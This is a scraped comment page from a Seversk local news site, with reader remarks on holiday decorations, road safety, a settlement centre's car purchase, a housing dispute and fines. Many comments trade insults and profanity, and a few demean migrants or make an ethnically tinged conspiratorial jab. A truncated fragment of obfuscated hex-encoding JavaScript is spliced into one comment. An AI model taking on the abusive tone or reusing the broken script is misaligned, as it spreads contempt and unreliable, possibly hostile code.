Последние комментарии:

28.12.2025 09:46 написал Set
08.12.2025 19:44 написал Set
26.11.2025 18:20 написал tourson
11.11.2025 21:45 написал FANTOMAS
10.11.2025 22:27 написал Ст. урядник
24.09.2025 16:16 написал Set
05.09.2025 09:34 написал Set
15.08.2025 12:25 написал Set
08.08.2025 20:49 написал Ст. урядник
05.07.2025 11:26 написал Set
28.06.2025 11:37 написал tourson
15.06.2025 22:47 написал барыга
11.06.2025 22:54 написал tourson
11.06.2025 22:53 написал tourson
11.06.2025 22:49 написал tourson

Комментарий № 146485: В пятницу состоится торжественное открытие ледового городка

Написал: White_fox-
 HaTaJlu, а чего красивого смотреть на потихоньку засыхающию палку с ветками? Да, если бы там росла ЖИВАЯ ель, это было бы круто, но не специально срубленная. 

То что, НАКОНЕЦ-ТО додумались поставить искуственную, могу только сказать - молодцы!  Давно пора было  так сделать. 


Комментарий № 146484: Любовь зла

Написал: Roman
zuri,
Дебил что ли?

Комментарий № 146483: Любовь зла

Написал: zuri
Это возмутительно. Критика должна быть конструктивной, но не оскорбительной. Очевидно, что наименование статьи, её содержание, по моему мнению, содержит признаки преступления, предусмотренного  ст.319 УК РФ. "Оскорбление представителя власти". Диспозиция и санкция данной статьи звучат следующим образом: «Публичное оскорбление представителя власти при исполнении им своих должностных обязанностей или в связи с их исполнением - наказывается штрафом в размере до сорока тысяч рублей или в размере заработной платы или иного дохода осужденного за период до трех месяцев, либо обязательными работами на срок до трехсот шестидесяти часов, либо исправительными работами на срок до одного года». Следственный комитет города обязан принять решение о возбуждении уголовного дела в отношении автора статьи.

Комментарий № 146482: Томские активисты ОНФ обратили внимание на закупку дорогостоящего автомобиля северским расчетным центром

Написал: Panika
лучше бы они обратили бы внимание на законность существования такого центра.

" прибылью, которая по итогам прошлого года составила 209 тыс. рублей"   ну как же так ?   все платежи города за ЖКУ проходят через ЕРКЦ (миллиарды) а прибыль 209 тыщ, смешно.

и что за олени в этом путинском ОНФ ?   как это АО может своей прибылью распоряжаться ?   Ею распоряжаются АКЦИОНЕРЫ, то есть Администрация как единственный акционер в лице Диденко.  

по итогам 14 года 209 тыщ прибыль, тачка стоит 1 млн. ВОПРОС: Атаманчук и Диденке - чо накопили чтоли?

 

Комментарий № 146481: Любовь зла

Написал: shoker
все правильно написано.

Комментарий № 146480: Любовь зла

Написал: ПолиграфПолиграфович
Цитата: Афоня
ну и смысл этой статейки ???? все это и так прекрасно знают ... какие предложения ?????  долгих в президенты или на место пескова  ????
ага, тоже962 не понял смысла

Комментарий № 146478: В пятницу состоится торжественное открытие ледового городка

Написал: Ketorol
Я против вырубания елей. И эта елка на главном месте города, очень красиво выглядит. 

Комментарий № 146477: Сохраним музей!

Написал: 2024
Тысячи северчан видели подлинники картин Николая Рериха на 2 выставках благодаря общественному музею им. Н.К. Рериха. Теперь уникальный музей сам нуждается в помощи.

Комментарий № 146476: Томские активисты ОНФ обратили внимание на закупку дорогостоящего автомобиля северским расчетным центром

Написал: f1gv83
Цитата: bullin
Где же были "фронтовички", когда в сентябре 2015 были выборы и можно было спросить с директора Атаманчук Н.С. и за автомобиль, и за страховку за казённый счёт, и за многое другое

за пачку печенья промолчали и еще благодарили! вот где они были...
Гитлер не покорил, дак "свои" же и  "купили" гнилыми обещаниями.

Комментарий № 146475: Томские активисты ОНФ обратили внимание на закупку дорогостоящего автомобиля северским расчетным центром

Написал: f1gv83
а чо бы на жигулях не покататься? перед кем форсить, а?
или за свои бабки берите и покупайте, авось не разоритесь!

Комментарий № 146474: На пешеходных переходах нет освещения

Написал: nitricus
Неужели хоть кто-то заметил эту проблему!! Вечером в дождь вообще пешехода не видно только моргающий желтый сигнал!!! Реально глаза устают присматриваться на каждом пешеходном!!!!!

Комментарий № 146473: Томские активисты ОНФ обратили внимание на закупку дорогостоящего автомобиля северским расчетным центром

Написал: Афоня
проездной на автобус на весь год  им .....  а то губа треснет !!!!

Комментарий № 146472: Любовь зла

Написал: Афоня
ну и смысл этой статейки ???? все это и так прекрасно знают ... какие предложения ?????  долгих в президенты или на место пескова  ????

Комментарий № 146471: Томские активисты ОНФ обратили внимание на закупку дорогостоящего автомобиля северским расчетным центром

Написал: Renamed
Это Наталья Сергеевна решила сделать себе подарок на Новый Год вместо выплаты премий своим сотрудникам в кризисное время? Позорище.

Комментарий № 146470: Спасибо вам за такую красивую инсталляцию!

Написал: mdaaa
Чего вы удивляетесь у вас вообще дом быдлядский. Сколько раз видел как люди выносят пакеты с мусором и ставят у двери к мусоропроводу с улицы. У вас же там вечно такие кучи валяются.

Комментарий № 146469: Томские активисты ОНФ обратили внимание на закупку дорогостоящего автомобиля северским расчетным центром

Написал: lusc
на Северскую администрацию и её кофемашины обратите, пожалуйста внимание, и на реконструкцию фонтанов 2 раза в год!!!!

Комментарий № 146468: Любовь зла

Написал: Roman
Дядя Фёдор,
Вы хоть знаете, что это слово означает, любезный?

Комментарий № 146467: Недалеко от Северска в ДТП пострадали два водителя

Написал: Дядя Фёдор
улитыч,
хоть текст то читай.. мужик на встречку вылез..

Комментарий № 146466: Любовь зла

Написал: Дядя Фёдор
не надо тут пиарится..

Комментарий № 146465: Спасибо вам за такую красивую инсталляцию!

Написал: Дядя Фёдор

У нас тоже(Комм. 120) какие то ли из кишлака то ли из аула заехали.. тупо ставят пакет с мусором возле мусоропровода.. это выше моего понимания!! ну уж если донес до мусопровода - засунь ты его туда, блин!!

Комментарий № 146464: На пешеходных переходах нет освещения

Написал: Мефодий
Цитата: Лено4ка
А еще некоторые м...лы не смотрят куда едут,в нашем городе хватает и тех и других.
согласен

Комментарий № 146463: Спортклуб «Янтарь» назвал десятку лучших спортсменов СХК

Написал: zxc
,[quoteВсе спортсмены клуба «Янтарь» выражают благодарность руководству клуба и лично Леониду Козыреву]


Италия, Болгария  ... ляпота! 

Комментарий № 146461: На пешеходных переходах нет освещения

Написал: Лено4ка
Гайзенберг,
А еще некоторые м...лы не смотрят куда едут,в нашем городе хватает и тех и других.

Комментарий № 146460: Б76

Написал: AntiVandal
PrincessA,
У меня есть чувство стыда и совести,просто тут всё очень легко и понятно в этом деле,жадность-фраера сгубила,вот и живёт теперь этот фраер на подселении,и знайте-правда жить не мешает.Не захотел человек по хорошему-вот и результат получил,пусть теперь пожинает плоды от своих действий.

Комментарий № 146459: На пешеходных переходах нет освещения

Написал: Лено4ка
Тема действительно серьезная. Такое чувство что фонари стоят для освещения самого фонаря,не более того.
Я так думаю,что администрация нашего замечательного города ждет какого  ПРОИШЕСТВИЯ,чтоб начать думать на эту тему.
С Натуськой полностью согласна!

Комментарий № 146456: Томские активисты ОНФ обратили внимание на закупку дорогостоящего автомобиля северским расчетным центром

Написал: bullin
Где же были "фронтовички", когда в сентябре 2015 были выборы  и можно было спросить с директора Атаманчук Н.С. и за автомобиль, и за страховку за казённый счёт, и за многое другое

Комментарий № 146455: Губернатор и руководство «Росатома» оценили проекты Северской ТОР

Написал: Землянин

«…На дурака не нужен нож,

Ему с три короба наврешь

И делай с ним, что хошь…»

Очевидно, что инструмент ТОР к развитию химических технологий, о которых в статье, не имеет никакого отношения. «Закон о ТОРах - это подготовка к развалу страны на отдельные лакомые кусочки» - http://forum-msk.org/material/region/10726390.html

Не очевидно это тем, для которых род, народ, родина не являются основными жизненными ценностями. 

Комментарий № 146454: На пешеходных переходах нет освещения

Написал: Liberator
АО "СХК" ведёт активную работу в этом направлении. После постройки очередного могильника для радиоактивных отходов и допущения пары серьёзных аварий на производстве, большая часть населения Северска начнёт светиться.

Комментарий № 146453: Губернатор и руководство «Росатома» оценили проекты Северской ТОР

Написал: Землянин
Менахем Мендель, который утвердил Концепцию создания в Томской области инновационного территориального центра, является гражданином Израиля. Именно, поэтому, его холуй предложил приступить к проработке инициатив по изменению федерального законодательства. Заявленная цель изменения федерального законодательства – обеспечения успешного функционирования территорий опережающего развития  - дурилка для лохов. 

Комментарий № 146452: На улице Ленинградской поменяют режим работы светофора

Написал: cvk
Цитата: ichker
почему не разрешают поворот со средней полосы направо
 
ни в коем случае! а вдруг вам там удобно станет... 

Комментарий № 146451: Рабочая группа поддержала смену часового пояса для Томской области

Написал: Kapitalin-nike
Ульяна,
Ну, так ты свои сфоткай и отправь в редакцию, в следующий раз будут их парафинить! wink wink wink

Комментарий № 146450: На пешеходных переходах нет освещения

Написал: Натуська
Ужас! Все время боюсь, что внезапно появится пешеход, и его просто не заметно из-за "хорошей" освещенности наших дорог. С этим надо что-то делать.

Комментарий № 146449: В пятницу состоится торжественное открытие ледового городка

Написал: ichker
То, что ель искусственная, это даже хорошо, сохраняем леса. А вы лучше спросите, где то новейшее украшение из светодиодов, которое пару лет вешали на площади, а потом один раз на ДК. Островского? Где светодиодная илюминация по всему городу, которую нам обещали еще в 12 году? До сих пор большинство гирлянд из ламп накаливания.

Комментарий № 146448: Любовь зла

Написал: Мефодий
мистер Долгих?

Комментарий № 146447: Глава УФСКН по Томской области Игорь Толстоносов может быть назначен заместителем губернатора

Написал: FANTOMAS
Поздравляю! 


--------------------
Интернет – свободная площадка для общения. Но виртуальный мир – это продолжение мира реального, в которых люди живут в рамках определенных норм, в том числе – закона. К сожалению, некоторые пользователи глобальной сети об этом забывают. И – оказываются на скамье подсудимых.

Комментарий № 146446: В пятницу состоится торжественное открытие ледового городка

Написал: HaTaJlu
Ну почему, ПОЧЕМУ везде стоят живые ели, а на главном месте в городе непонятное зеленое украшенное сооружение??!! УЖАС! angry sad 

Комментарий № 146445: Зимний дрифт

Написал: bolek
Цитата: Bobby_Smith
если вы купили новую кию, через пару-тройку лет вы купите еще одну новую кию=)
 

А разве в этом есть что-то плохое? Если есть возможность приобретать новый автомобиль каждые 3-5 лет?

 

Комментарий № 146444: На пешеходных переходах нет освещения

Написал: Гайзенберг
а ещё эти мудилы прут как броня, даже несмотрят едит машина или нет

Комментарий № 146443: Рабочая группа поддержала смену часового пояса для Томской области

Написал: Гайзенберг
Марина 75,
какие 17. в 16 уже ночь

Комментарий № 146442: Зимний дрифт

Написал: Bobby_Smith
Roman, любая новая машина развалится через 3 года не зависимо от страны производителя и престижа фирмы. я даже не то чтобы против корейцев. мне новые машины в целом не нравятся. и дурость это бежать и покупать в кредит хундай потому что он новый. чайзер, которому 15лет без проблем проездит еще столько же, а вот новая тачка рассыпется после окончания гарантии. ну это касается всех производителей и моледей старше 12-15л. сейчас машины делают так и хоть вы пяткой в грудь себя заколотите ничего не изменится. если вы купили новую кию, через пару-тройку лет вы купите еще одну новую кию=)

Комментарий № 146441: Недалеко от Северска в ДТП пострадали два водителя

Написал: улитыч
Опять женщина-водитель,да еще и 59 лет.Сидела бы дома с внуками,и так на дорогах тесно

Комментарий № 146440: Спасибо вам за такую красивую инсталляцию!

Написал: Каа9631
Некоторые особи (по другому назвать, язык не поворачивается) не поддаются обучению и постоянно гадят под себя всю жизнь.

Комментарий № 146439: Б76

Написал: PrincessA
AntiVandal,
Мне бы стыдно было на вашем месте!!!  
А я знаю!!!  Вам просто правда жить мешает!!!   

Комментарий № 146438: Спасибо вам за такую красивую инсталляцию!

Написал: Мефодий
место там нехорошее

Комментарий № 146437: Спасибо вам за такую красивую инсталляцию!

Написал: Диковинка
у нас каждую неделю такая картина .... Люди ужас

Комментарий № 146436: Спасибо вам за такую красивую инсталляцию!

Написал: f1gv83
быдлогорск

Комментарий № 146435: Спасибо вам за такую красивую инсталляцию!

Написал: Таверна
Не в эту тему маленько, а втему 151го. Почему так много квартир в этом доме продается?? Подозрительно как-то.

Комментарий № 146434: Новогодние подарки на любой вкус и кошелёк

Написал: BVD
Хотят ободрать народ любыми безделушками, но дураков нетю

Комментарий № 146433: Б76

Написал: AntiVandal
PrincessA,
Как человек вроде тебя может знать кто и за что понесёт наказание?Небыло абсолютно никокого намёка на мошенничество.Всё было заверено документально и нотариально,никто никого не кидал и не собирался.Так что свои доводы засуньте пожалуйста поглубже в свои дырочки,если не ошибаюсь у вас их 3-штуки (в любую на выбор).Спасибо

Комментарий № 146432: Спасибо вам за такую красивую инсталляцию!

Написал: Bmx
Ничего не скажешь, это у них в крови.
Одним словом - СВИНЬИ. 

Комментарий № 146431: Б76

Написал: AntiVandal
Уважаемые товарищи которые сидят на диване и дают свои необоснованные советы и версии-засуньте пожалуйста их к себе поглубже в своё заднее проходное отверстие.Незная брода-не суйся в воду!
Зачем вы клеветаете человека своими необоснованными доводами если вы не в курсе всех событий!?На ваше мнение и советы все хотят ссать с высокой колокольни.До чего же вы все умные товарищи!?Перемалывайте себе кости и своим родственникам.

Комментарий № 146430: Полицейские задержали водителя, повторно севшего за руль в состоянии опьянения

Написал: Бука
таких нужно лишать прав пожизненно.

Комментарий № 146429: ООО УК «Комфорт» три месяца задерживает заработную плату

Написал: natalya_2508
Panika,
Согласна с вами полностью!
Данную позицию (сидеть на .... ровно) не разделяю, отчего порой страдаю, увы, как раз из-за осуждения тех, кто разделяет и из-за вечного нахождения в меньшинстве.
Автору только такая позиция и подходит, судя по тому, что 3 месяца терпел (а) смиренно, а тут !!!! написал (а) целый пост здесь и в соц.сетях. Ну вот сейчас прям точно сработает!!!!!
Бред! Смешно! такое чувство, что люди здесь пишут лишь бы просто написать.. fellow

Комментарий № 146428: Рабочая группа поддержала смену часового пояса для Томской области

Написал: Ульяна
что за фотография тупая? с ляшками какой-то девахи?

Комментарий № 146427: Я тебя очень люблю!

Написал: Ульяна
я промолчу)

Комментарий № 146426: ООО УК «Комфорт» три месяца задерживает заработную плату

Написал: natalya_2508
SPUTNIK,
Черную зарплату ещё доказать надо, но легко получится, если коллективно идти..хотя что-то мне подсказывает, что остальной коллектив, помимо автора поста, всё устраивает из-за боязни лишиться работы, может я не права конечно..
Далее, заявителям следует помнить, что уклонение от уплаты налогов и (или) сборов с физ.лиц (а согласившись получать черную ЗП работники именно этим и занимаются) предусматривает ответственность, почитайте законы.
Так что тут палка о двух концах как бээ))))

Комментарий № 146425: Рабочая группа поддержала смену часового пояса для Томской области

Написал: Марина 75
Давно пора. В 17 темень уже такая angry 

Комментарий № 146424: Новогодняя кружевная сказка

Написал: ichker
Вот именно, красота и оригинальность в простом. А некоторые до сих пор делают ёлочку из китайской герлянды и думают оформили ветрину. Я молчу про торговые центры. ЦУМ - явно что то пошло не так и одна цифра, в отличии от других поменяла цвет. Мармелайт - эти тусклые "сосульки" явно не уровень центрального ТРЦ города.
 

Комментарий № 146423: Б76

Написал: 3oJIoTo
PrincessA,
Ох,ещё увидите кто с голой жопой останется!)))У семьи с тремя детьми всяко рыльце в пушку,так что зря на людской суд это всё вынесли!!!

Комментарий № 146422: Недалеко от Северска в ДТП пострадали два водителя

Написал: lusc
Мазда вся была забита коробками до потолка.Наверно что то вез, торопился.

Хорошо хоть все живы! 

Комментарий № 146421: ДТП на Северной автодороге

Написал: lusc
Цитата: Paralax
про эту аварию спрашиваете? Оба водителя госпитализированы.

да, спасибо за инфо 

Комментарий № 146420: Рабочая группа поддержала смену часового пояса для Томской области

Написал: Toni
Рабочая группа подавляющим большинством голосов приняла решение поддержать инициативу Губернатора
А что, могли не поддержать?? 

Комментарий № 146419: Двойной тариф

Написал: Ember
Я платил штраф прямо в личном кабинете в госуслугах.

Комментарий № 146418: На улице Ленинградской поменяют режим работы светофора

Написал: Ember
Часто с правой полосы в Томск очередь такая, что не успевают в один поток проехать, зачем 2 полосы налево, не понятно.

Комментарий № 146417: Найдена маленькая собачка

Написал: HaTaJlu
Какая хорошенькая! love 

Комментарий № 146416: Двойной тариф

Написал: Avedi
Самое интересное, что северские приставы без зазрения совести списывают оплаченные штрафы повторно с банковских карт.

Комментарий № 146415: Двойной тариф

Написал: Liberator
Всё правильно сказано в видеоматериале.
1. Чё тянуть-то до последнего? Вот и получите.
2. Уже пора повзрослеть и не ждать, что о вас будут заботиться!
В век технологий, неужели трудно зарегистрироваться на портале gosuslugi.ru и просматривать всю, касающуюся вас информацию (налоги, штрафы, ПФР и т.д.). Оплачивать штрафы очень удобно, плюс: оплата фиксируется на 100% и ГБДД уже не предъявит.
А если не полениться и установить приложение на смартфон (любой), то просматривать и оплачивать станет ещё удобнее.
Чё ныть то?

Комментарий № 146414: Зимний дрифт

Написал: f1gv83
Цитата: Panika
по спидометру (кругляш слева) там за 90 км/ч частенько переваливал.

спидометр работает по датчику скорости на коробке, а коробка крутится настолько, на сколько крутся колеса :)
можно и стоя на месте под соточку давить :D у некоторых получается...

Комментарий № 146413: Зимний дрифт

Написал: f1gv83
Цитата: Roman
А вот, кстати, в приходом зимы катастрофически выросло количество идиотов, которые не видят где правая полоса, где левая и едут строго посередине. Меня одного бесят?

дык один баран так проехал, потом второй, затем стадо накатало колею и все начали по ней ездить)

меня прикалывает на отрезке от солнечной до северной ехать строго по полосе, не обращая внимания на "колею" эту, благо места там дофига и больше; когда какой-то летчик, несясь по колее, резко меняет полосу на полосу, а тут я еду спокойненько - дальний свет, сигнал - оказывается, там можно нормально уместиться!

и на северной такая же фигня...

Комментарий № 146412: ДТП на Северной автодороге

Написал: f1gv83
шта? опять?!

Комментарий № 146411: Б76

Написал: PrincessA
3oJIoTo,
Так это далеко не чушь))))  
Сейчас проводится проверка как раз по этому поводу  и не переживайте Потехины понесут своё наказание!!!!  А эти лохи как вы называете предупредили своей статьей всех, чтоб другие лохами не стали при покупке квартиры!!!!   Суд осудит их за их действия мошеничества в ближайшее время!! 

Комментарий № 146410: На улице Ленинградской поменяют режим работы светофора

Написал: Лиса
ichker,
не надо палить контору wink 
Все нормальные люди так ездят, отчаявшись дождаться каких-либо действий от ленивых лоботрясов, отвечающих за это направление. 

Комментарий № 146409: На улице Ленинградской поменяют режим работы светофора

Написал: ichker
Не понимаю, почему не разрешают поворот со средней полосы направо. Если в ГИБДД считают, что не достаточно радиуса для поворота автобусам направо, то предлогаю им подежурить или установить скрытное наблюдение за междугородними автобусами, идущими с ул. Ленинградской, и они убедятся, что автобусы ПАЗики легко преодолевают этот поворот со средней полосы. Свидетелем чего стал лично, несколько дней назад.

Комментарий № 146408: Двойной тариф

Написал: Бука
сняли 500, пусть возвращают 1000 из кармана судебных приставов и гайцов, тогда сразу порядок наведут, ибо это все сделано искусственно.

Комментарий № 146407: ДТП на Северной автодороге

Написал: Бука
кто виноват?

Комментарий № 146406: Сбили женщину

Написал: michael
Как насчет петиции, чтобы пешика посадили или пожизненный штрав всучить?) Она же сама виновата!

Комментарий № 146405: На ЦКПП сбили пешехода

Написал: michael
f1gv83,
Могу тебе только посоветовать карму сходить почистить, раз тебе регулярно пешики прямо наверное прыгают под колеса. Не первый год езжу и ничего подобного не замечаю. Ну я просто как лох езжу по правилам, вы наверное под соточку валите, вот вам и кажется всем.

Комментарий № 146404: Зимний дрифт

Написал: Arteq
Roman,
++ за корейцев

Комментарий № 146403: Зимний дрифт

Написал: Roman
Bobby_Smith,
Вот не надо на корейцев гнать, кстати. Посмотри, что будет со свежей BMW через 3 года эксплуатации. Но на чайзерах в 2015 году ездить - дурость.

Комментарий № 146402: Б76

Написал: 3oJIoTo
Сейчас ещё и за распространение лжи подтянут!Мозгов 00000!Ужас,что вам спокойно не живется!?!?!

Комментарий № 146401: Б76

Написал: 3oJIoTo
Мне кажется,что модераторам сначала нужно проверять информацию перед тем как публиковать вот такую х*йню!Облили грязью и пздц!В итоге никакой истины никто не получил, тупо очернили людей!Ещё и фотки выложили,идиоты!Лучше б фотки тех лохов выложили,а то мне тоже бабки нужны!)))

Комментарий № 146400: Зимний дрифт

Написал: Bobby_Smith
depthcore, тоесть ты привержинец новых солярисов и кий, которые разваливаются сразу по окончании гарантийного срока? ну-ну=)

Комментарий № 146399: Двойной тариф

Написал: Kapitalin-nike

В стране, которой правят воры и ради воров, иначе и быть не может! Быдло молчит - шакалы борзеют!

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "vseverske.info"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Комментарий № 146398: Б76

Написал: depthcore
По мне так получается, что бывший муж такой же кинутый как и те кто купил квартиру, но все почему-то советуют вместо мошенницы Потехиной бороться с мужиком которого бывшая жена так же прокинула. Им бы вместе на два фронта эту мошенницу засудить, а не с друг другом разборки устрайвать.

Комментарий № 146396: Зимний дрифт

Написал: depthcore
Bobby_Smith, гавно же уже старое с рулем в бардачке, которое хавают в соусе "легендарного качества" японской сборки. Ну и любители "дрифта" и прочие неполноценные стараются чтобы уже "живых" экземпляров не было на территории страны.

Комментарий № 146395: Зимний дрифт

Написал: Bobby_Smith
Roman, ну с этим хер поспоришь=)

Комментарий № 146394: Двойной тариф

Написал: mimoprohodil
Мр@3и

Комментарий № 146393: Судебный пристав награжден за высокие профессиональные достижения

Написал: Agafon
понятия юрист это то что я понемаю,либо то что сдесь написали

Комментарий № 146392: ДТП на Северной автодороге

Написал: воспитатель
эта дорога в лидерах по ДТП и ГАИ всё рейды какие то для отписок проводят, работать то им бедным некогда по профилактики ДТП с  организациями отвечающими за состояние дорог

Комментарий № 146391: Зимний дрифт

Написал: воспитатель
такие всегда находят приключений на свою жо.... и стосбов на них  хватит, лишь бы простой народ не пострадал

Комментарий № 146390: Полицейские задержали северчанина подозреваемого в сбыте наркотиков в крупном размере

Написал: 555666
yurayurov,
Ты про что вобще? Я про тех кто орал тут город не открывать, у нас сдесь рай а то понаедут.Вот я про что и про ккого.А ты про что.

Комментарий № 146388: Найдена маленькая собачка

Написал: Санёк Северский
проходящий,
так в принципе и написан номер

Комментарий № 146387: «Из чего состоит книга»

Написал: Seversk-7
troll,
+++++
stroimguru.ru
Курс валюты:
77.83 32↓   $     90.53 66↓  

Опрос дня:

Вы будете делать прививку от коронавируса?

Нет   49.38%
   
Да, планирую   8.64%
   
Да, но если заставят (на работе / для путешествий)   4.94%
   
Уже сделал   27.16%
   
Затрудняюсь ответить   9.88%
   
Всего голосов: 81

Все опросы >>

Архив статей: